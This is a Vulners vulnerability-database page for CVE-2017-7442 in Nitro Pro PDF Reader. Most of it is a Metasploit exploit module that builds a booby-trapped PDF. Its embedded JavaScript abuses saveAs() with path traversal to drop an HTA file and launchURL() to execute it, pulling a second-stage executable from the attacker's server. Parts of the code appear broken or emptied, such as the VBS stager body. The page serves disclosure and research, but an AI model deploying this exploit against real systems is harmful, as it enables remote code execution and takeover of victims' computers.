Vulners
Lucene search
SRC-2017-0005 : Nitro PDF Pro Doc.saveAs and App.launchURL Remote Code Execution Vulnerabilities
🗓️ 05 Apr 2017 00:00:00Reported by Steven Seeley of Source InciteType 
srcincite🔗 srcincite.io👁 32 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution Exploit | 2 Aug 201700:00 | – | zdt |
 | CVE-2017-7442 | 2 Aug 201700:00 | – | circl |
 | Nitro Pro Arbitrary Code Execution Vulnerability | 3 Aug 201700:00 | – | cnvd |
 | Nitro Pro PDF Reader JavaScript API Remote Code Execution (CVE-2017-7442) | 13 Aug 201700:00 | – | checkpoint_advisories |
 | CVE-2017-7442 | 3 Aug 201708:00 | – | cve |
 | CVE-2017-7442 | 3 Aug 201708:00 | – | cvelist |
 | Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit) | 2 Aug 201700:00 | – | exploitdb |
 | Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution | 24 Jul 201715:21 | – | metasploit |
 | CVE-2017-7442 | 3 Aug 201708:29 | – | nvd |
 | Nitro Pro 'saveAs and launchURL' Code Execution Vulnerability - Windows | 8 Aug 201700:00 | – | openvas |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog
Note: This is 100% reliable.
},
'License' => MSF_LICENSE,
'Author' => [
'mr_me', # vulnerability discovery and exploit
'bcoles', # hidden hta tricks!
'sinn3r' # help with msf foo!
],
'References' => [
[ 'CVE', '2017-7442' ],
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
],
'DefaultOptions' => {
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Targets' => [
# truly universal
[ 'Automatic', {} ],
],
'DisclosureDate' => '2017-07-24',
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
vbs = %Q||
vbs.gsub!(/ /, '')
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending second stage payload")
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "/Windows/Temp"
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
pdf = %Q|%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
|
pdf << build_vbs(payload_src, stager_name)
pdf << %Q|
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [ (EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF|
pdf.gsub!(/ /, '')
file_create(pdf)
super
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 38.8
EPSS0.70304